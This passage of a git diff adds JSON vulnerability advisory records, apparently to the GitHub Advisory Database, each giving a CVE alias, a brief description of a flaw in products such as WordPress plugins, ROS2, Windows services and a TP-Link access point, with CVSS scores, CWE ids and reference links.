lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-29754" + }, + { + "type": "WEB", + "url": "https://source.android.com/security/bulletin/pixel/2024-04-01" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-05T20:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-87q7-rp2h-q5xw/GHSA-87q7-rp2h-q5xw.json b/advisories/unreviewed/2024/04/GHSA-87q7-rp2h-q5xw/GHSA-87q7-rp2h-q5xw.json new file mode 100644 index 00000000000..fb85e66a977 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-87q7-rp2h-q5xw/GHSA-87q7-rp2h-q5xw.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-87q7-rp2h-q5xw", + "modified": "2024-04-09T21:31:59Z", + "published": "2024-04-09T21:31:59Z", + "aliases": [ + "CVE-2024-2018" + ], + "details": "The WP Activity Log Premium plugin for WordPress is vulnerable to SQL Injection via the entry->roles parameter in all versions up to, and including, 4.6.4 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers with subscriber privileges to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. One demonstrated attack included the injection of a PHP Object.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-2018" + }, + { + "type": "WEB", + "url": "https://melapress.com/support/kb/wp-activity-log-plugin-changelog" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/2f060ea1-01e2-4e5b-82ba-b5cdd0d8290a?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T19:15:24Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-87x6-8m9v-g8c2/GHSA-87x6-8m9v-g8c2.json b/advisories/unreviewed/2024/04/GHSA-87x6-8m9v-g8c2/GHSA-87x6-8m9v-g8c2.json new file mode 100644 index 00000000000..1b2423a9c84 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-87x6-8m9v-g8c2/GHSA-87x6-8m9v-g8c2.json @@ -0,0 +1,39 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-87x6-8m9v-g8c2", + "modified": "2024-04-10T15:30:40Z", + "published": "2024-04-10T15:30:40Z", + "aliases": [ + "CVE-2024-29296" + ], + "details": "A user enumeration vulnerability was found in Portainer CE 2.19.4. This issue occurs during user authentication process, where a difference in response time could allow a remote unauthenticated user to determine if a username is valid or not.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-29296" + }, + { + "type": "WEB", + "url": "https://github.com/ThaySolis/CVE-2024-29296" + }, + { + "type": "WEB", + "url": "http://portainer.com" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-10T15:16:05Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-8836-xpm5-3j5w/GHSA-8836-xpm5-3j5w.json b/advisories/unreviewed/2024/04/GHSA-8836-xpm5-3j5w/GHSA-8836-xpm5-3j5w.json new file mode 100644 index 00000000000..f9c56f03d34 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-8836-xpm5-3j5w/GHSA-8836-xpm5-3j5w.json @@ -0,0 +1,50 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-8836-xpm5-3j5w", + "modified": "2024-04-08T21:31:16Z", + "published": "2024-04-08T21:31:16Z", + "aliases": [ + "CVE-2024-3466" + ], + "details": "A vulnerability was found in SourceCodester Laundry Management System 1.0. It has been declared as critical. Affected by this vulnerability is the function laporan_filter of the file /application/controller/Pengeluaran.php. The manipulation of the argument dari/sampai leads to sql injection. The associated identifier of this vulnerability is VDB-259747.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-3466" + }, + { + "type": "WEB", + "url": "https://github.com/fubxx/CVE/blob/main/LaundryManagementSystemSQL4.md" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.259747" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.259747" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.312314" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-08T21:15:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-88wh-w28v-xrhh/GHSA-88wh-w28v-xrhh.json b/advisories/unreviewed/2024/04/GHSA-88wh-w28v-xrhh/GHSA-88wh-w28v-xrhh.json new file mode 100644 index 00000000000..86e903ca7c4 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-88wh-w28v-xrhh/GHSA-88wh-w28v-xrhh.json @@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-88wh-w28v-xrhh", + "modified": "2024-04-09T21:31:59Z", + "published": "2024-04-09T21:31:59Z", + "aliases": [ + "CVE-2024-2344" + ], + "details": "The Avada theme for WordPress is vulnerable to SQL Injection via the 'entry' parameter in all versions up to, and including, 7.11.6 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticted attackers, with editor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-2344" + }, + { + "type": "WEB", + "url": "https://avada.com/documentation/avada-changelog" + }, + { + "type": "WEB", + "url": "https://gist.github.com/Xib3rR4dAr/05a32f63d75082ab05de27e313e70fa3" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/ccf0d2ca-2891-45d1-8ea2-90dd435b359f?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T19:15:33Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-899x-gqmc-4hgm/GHSA-899x-gqmc-4hgm.json b/advisories/unreviewed/2024/04/GHSA-899x-gqmc-4hgm/GHSA-899x-gqmc-4hgm.json new file mode 100644 index 00000000000..a140c1c7ed6 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-899x-gqmc-4hgm/GHSA-899x-gqmc-4hgm.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-899x-gqmc-4hgm", + "modified": "2024-04-09T18:30:25Z", + "published": "2024-04-09T18:30:25Z", + "aliases": [ + "CVE-2024-26212" + ], + "details": "DHCP Server Service Denial of Service Vulnerability", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-26212" + }, + { + "type": "WEB", + "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-26212" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-400" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T17:15:39Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-89fv-9763-xj44/GHSA-89fv-9763-xj44.json b/advisories/unreviewed/2024/04/GHSA-89fv-9763-xj44/GHSA-89fv-9763-xj44.json new file mode 100644 index 00000000000..68c0062f39d --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-89fv-9763-xj44/GHSA-89fv-9763-xj44.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-89fv-9763-xj44", + "modified": "2024-04-09T03:30:52Z", + "published": "2024-04-09T03:30:52Z", + "aliases": [ + "CVE-2024-28167" + ], + "details": "SAP Group Reporting Data Collection does not perform necessary authorization checks for an authenticated user, resulting in escalation of privileges. On successful exploitation, specific data can be changed via the Enter Package Data app although the user does not have sufficient authorization causing high impact on Integrity of the appliction.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-28167" + }, + { + "type": "WEB", + "url": "https://me.sap.com/notes/3442378" + }, + { + "type": "WEB", + "url": "https://support.sap.com/en/my-support/knowledge-base/security-notes-news.html?anchorId=section_370125364" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T01:15:49Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-89hm-2q6m-373c/GHSA-89hm-2q6m-373c.json b/advisories/unreviewed/2024/04/GHSA-89hm-2q6m-373c/GHSA-89hm-2q6m-373c.json new file mode 100644 index 00000000000..4160d4b3ad6 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-89hm-2q6m-373c/GHSA-89hm-2q6m-373c.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-89hm-2q6m-373c", + "modified": "2024-04-09T15:30:37Z", + "published": "2024-04-09T15:30:37Z", + "aliases": [ + "CVE-2023-49907" + ], + "details": "A stack-based buffer overflow vulnerability exists in the web interface Radio Scheduling functionality of Tp-Link AC1350 Wireless MU-MIMO Gigabit Access Point (EAP225 V3) v5.1.0 Build 20220926. A specially crafted series of HTTP requests can lead to remote code execution. An attacker can make an authenticated HTTP request to trigger this vulnerability.This vulnerability refers specifically to the overflow that occurs via the `band` parameter at offset `0x0045aad8` of the `httpd_portal` binary shipped with v5.1.0 Build 20220926 of the EAP225.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-49907" + }, + { + "type": "WEB", + "url": "https://talosintelligence.com/vulnerability_reports/TALOS-2023-1888" + }, + { + "type": "WEB", + "url": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2023-1888" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-121" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T15:15:29Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-89j9-gpmp-c355/GHSA-89j9-gpmp-c355.json b/advisories/unreviewed/2024/04/GHSA-89j9-gpmp-c355/GHSA-89j9-gpmp-c355.json new file mode 100644 index 00000000000..60d0f2cab63 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-89j9-gpmp-c355/GHSA-89j9-gpmp-c355.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-89j9-gpmp-c355", + "modified": "2024-04-09T18:30:26Z", + "published": "2024-04-09T18:30:26Z", + "aliases": [ + "CVE-2024-26231" + ], + "details": "Windows DNS Server Remote Code Execution Vulnerability", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-26231" + }, + { + "type": "WEB", + "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-26231" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-416" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T17:15:43Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-8cc2-fr9v-6c2x/GHSA-8cc2-fr9v-6c2x.json b/advisories/unreviewed/2024/04/GHSA-8cc2-fr9v-6c2x/GHSA-8cc2-fr9v-6c2x.json new file mode 100644 index 00000000000..789e15e2f90 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-8cc2-fr9v-6c2x/GHSA-8cc2-fr9v-6c2x.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-8cc2-fr9v-6c2x", + "modified": "2024-04-10T15:30:40Z", + "published": "2024-04-10T15:30:40Z", + "aliases": [ + "CVE-2024-20778" + ], + "details": "Adobe Experience Manager versions 6.5.19 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by an attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-20778" + }, + { + "type": "WEB", + "url": "https://helpx.adobe.com/security/products/experience-manager/apsb24-21.html" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-10T09:15:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-8g65-2hpp-8gjf/GHSA-8g65-2hpp-8gjf.json b/advisories/unreviewed/2024/04/GHSA-8g65-2hpp-8gjf/GHSA-8g65-2hpp-8gjf.json new file mode 100644 index 00000000000..dd64f8f87c1 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-8g65-2hpp-8gjf/GHSA-8g65-2hpp-8gjf.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-8g65-2hpp-8gjf", + "modified": "2024-04-09T06:30:44Z", + "published": "2024-04-09T06:30:44Z", + "aliases": [ + "CVE-2024-30688" + ], + "details": "An arbitrary file upload vulnerability has been discovered in ROS2 Iron Irwini versions ROS_VERSION 2 and ROS_PYTHON_VERSION 3, allows attackers to execute arbitrary code via a crafted payload to the file upload mechanism of the ROS2 system, including the server’s functionality for handling file uploads and the associated validation processes.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-30688" + }, + { + "type": "WEB", + "url": "https://github.com/yashpatelphd/CVE-2024-30688" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T05:15:47Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-8g7p-mx5x-8frc/GHSA-8g7p-mx5x-8frc.json b/advisories/unreviewed/2024/04/GHSA-8g7p-mx5x-8frc/GHSA-8g7p-mx5x-8frc.json new file mode 100644 index 00000000000..3eec31d1caa --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-8g7p-mx5x-8frc/GHSA-8g7p-mx5x-8frc.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-8g7p-mx5x-8frc", + "modified": "2024-04-09T15:30:37Z", + "published": "2024-04-09T15:30:37Z", + "aliases": [ + "CVE-2023-47542" + ], + "details": "A improper neutralization of special elements used in a template engine [CWE-1336] in FortiManager versions 7.4.1 and below, versions 7.2.4 and below, and 7.0.10 and below allows attacker to execute unauthorized code or commands via specially crafted templates.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-47542" + }, + { + "type": "WEB", + "url": "https://fortiguard.com/psirt/FG-IR-23-419" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-1336" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T15:15:28Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-8g89-49x9-pqr8/GHSA-8g89-49x9-pqr8.json b/advisories/unreviewed/2024/04/GHSA-8g89-49x9-pqr8/GHSA-8g89-49x9-pqr8.json new file mode 100644 index 00000000000..33f210064fa --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-8g89-49x9-pqr8/GHSA-8g89-49x9-pqr8.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-8g89-49x9-pqr8", + "modified": "2024-04-09T18:30:26Z", + "published": "2024-04-09T18:30:26Z", + "aliases": [ + "CVE-2024-28902" + ], + "details": "Windows Remote Access Connection Manager Information Disclosure Vulnerability", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-28902" + }, + { + "type": "WEB", + "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-28902" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-126" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T17:15:48Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-8gfv-66rm-fqmg/GHSA-8gfv-66rm-fqmg.json b/advisories/unreviewed/2024/04/GHSA-8gfv-66rm-fqmg/GHSA-8gfv-66rm-fqmg.json new file mode 100644 index 00000000000..8048605fbfe --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-8gfv-66rm-fqmg/GHSA-8gfv-66rm-fqmg.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-8gfv-66rm-fqmg", + "modified": "2024-04-09T18:30:26Z", + "published": "2024-04-09T18:30:26Z", + "aliases": [ + "CVE-2024-28912" + ], + "details": "Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-28912" + }, + { + "type": "WEB", + "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-28912" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-122" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T17:15:50Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-8gq2-wxqv-qc6m/GHSA-8gq2-wxqv-qc6m.json b/advisories/unreviewed/2024/04/GHSA-8gq2-wxqv-qc6m/GHSA-8gq2-wxqv-qc6m.json new file mode 100644 index 00000000000..c31a1669890 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-8gq2-wxqv-qc6m/GHSA-8gq2-wxqv-qc6m.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-8gq2-wxqv-qc6m", + "modified": "2024-04-09T09:31:10Z", + "published": "2024-04-09T09:31:10Z", + "aliases": [ + "CVE-2024-30694" + ], + "details": "A shell injection vulnerability was discovered in ROS2 (Robot Operating System 2) Galactic Geochelone ROS_VERSION 2 and ROS_PYTHON_VERSION 3, allows attackers to execute arbitrary code, escalate privileges, and obtain sensitive information due to the way ROS2 handles shell command execution in components like command interpreters or interfaces that process external inputs.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-30694" + }, + { + "type": "WEB", + "url": "https://github.com/yashpatelphd/CVE-2024-30691" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T08:15:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-8h65-qg72-4ffh/GHSA-8h65-qg72-4ffh.json b/advisories/unreviewed/2024/04/GHSA-8h65-qg72-4ffh/GHSA-8h65-qg72-4ffh.json new file mode 100644 index 00000000000..1f40a53fbdc --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-8h65-qg72-4ffh/GHSA-8h65-qg72-4ffh.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-8h65-qg72-4ffh", + "modified": "2024-04-10T15:30:39Z", + "published": "2024-04-10T15:30:39Z", + "aliases": [ + "CVE-2024-3210" + ], + "details": "The Paid Membership Plugin, Ecommerce, User Registration Form, Login Form, User Profile & Restrict Content – ProfilePress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'reg-single-checkbox' shortcode in all versions up to, and including, 4.15.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-3210" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3067520/wp-user-avatar/trunk/src/ShortcodeParser/Builder/FieldsShortcodeCallback.php" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/f4986bc3-ee34-43a6-bad2-9f6665adb35c?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-10T06:15:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-8jhg-88f8-qqj6/GHSA-8jhg-88f8-qqj6.json b/advisories/unreviewed/2024/04/GHSA-8jhg-88f8-qqj6/GHSA-8jhg-88f8-qqj6.json new file mode 100644 index 00000000000..3a8b6cdc2f1 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-8jhg-88f8-qqj6/GHSA-8jhg-88f8-qqj6.json @@ -0,0 +1,50 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-8jhg-88f8-qqj6", + "modified": "2024-04-10T15:30:38Z", + "published": "2024-04-10T15:30:38Z", + "aliases": [ + "CVE-2024-3533" + ], + "details": "A vulnerability classified as problematic was found in Campcodes Complete Online Student Management System 1.0. Affected by this vulnerability is an unknown functionality of the file academic_year_view.php. The manipulation of the argument FirstRecord leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-259903.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-3533" + }, + { + "type": "WEB", + "url": "https://github.com/E1CHO/cve_hub/blob/main/Complete%20Online%20Student%20Management%20System/Complete%20Online%20Student%20Management%20System%20-%20vuln%206.pdf" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.259903" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.259903" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.312524" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-10T02:15:12Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-8m6g-88w4-cv35/GHSA-8m6g-88w4-cv35.json b/advisories/unreviewed/2024/04/GHSA-8m6g-88w4-cv35/GHSA-8m6g-88w4-cv35.json new file mode 100644 index 00000000000..2989f1f9708 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-8m6g-88w4-cv35/GHSA-8m6g-88w4-cv35.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-8m6g-88w4-cv35", + "modified": "2024-04-09T03:30:53Z", + "published": "2024-04-09T03:30:53Z", + "aliases": [ + "CVE-2024-30678" + ], + "details": "An issue has been discovered in ROS2 Iron Irwini ROS_VERSION 2 and ROS_PYTHON_VERSION 3, where the system transmits messages in plaintext. This flaw exposes sensitive information, making it vulnerable to man-in-the-middle (MitM) attacks, and allowing attackers to intercept and access this data.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-30678" + }, + { + "type": "WEB", + "url": "https://github.com/yashpatelphd/CVE-2024-30678" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T03:15:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-8mpq-46gw-jqf3/GHSA-8mpq-46gw-jqf3.json b/advisories/unreviewed/2024/04/GHSA-8mpq-46gw-jqf3/GHSA-8mpq-46gw-jqf3.json new file mode 100644 index 00000000000..b9f4ded1693 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-8mpq-46gw-jqf3/GHSA-8mpq-46gw-jqf3.json @@ -0,0 +1,50 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-8mpq-46gw-jqf3", + "modified": "2024-04-10T15:30:38Z", + "published": "2024-04-10T15:30:38Z", + "aliases": [ + "CVE-2024-3530" + ], + "details": "A vulnerability was found in Campcodes Complete Online Student Management System 1.0. It has been declared as problematic. This vulnerability affects unknown code of the file Marks_view.php. The manipulation of the argument FirstRecord leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-259900.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-3530" + }, + { + "type": "WEB", + "url": "https://github.com/E1CHO/cve_hub/blob/main/Complete%20Online%20Student%20Management%20System/Complete%20Online%20Student%20Management%20System%20-%20vuln%203.pdf" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.259900" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.259900" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.312521" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-10T01:15:20Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-8p73-58c5-5784/GHSA-8p73-58c5-5784.json b/advisories/unreviewed/2024/04/GHSA-8p73-58c5-5784/GHSA-8p73-58c5-5784.json new file mode 100644 index 00000000000..28a96ba6517 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-8p73-58c5-5784/GHSA-8p73-58c5-5784.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-8p73-58c5-5784", + "modified": "2024-04-09T18:30:28Z", + "published": "2024-04-09T18:30:28Z", + "aliases": [ + "CVE-2024-30704" + ], + "details": "An insecure deserialization vulnerability has been identified in ROS2 Galactic Geochelone ROS_VERSION 2 and ROS_PYTHON_VERSION 3, allows attackers to execute arbitrary code and obtain sensitive information via crafted input to the Data Serialization and Deserialization Components, Inter-Process Communication Mechanisms, and Network Communication Interfaces.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-30704" + }, + { + "type": "WEB", + "url": "https://github.com/yashpatelphd/CVE-2024-30704" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T18:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-8ppm-mwhc-2h38/GHSA-8ppm-mwhc-2h38.json b/advisories/unreviewed/2024/04/GHSA-8ppm-mwhc-2h38/GHSA-8ppm-mwhc-2h38.json new file mode 100644 index 00000000000..ff1c4728401 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-8ppm-mwhc-2h38/GHSA-8ppm-mwhc-2h38.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": 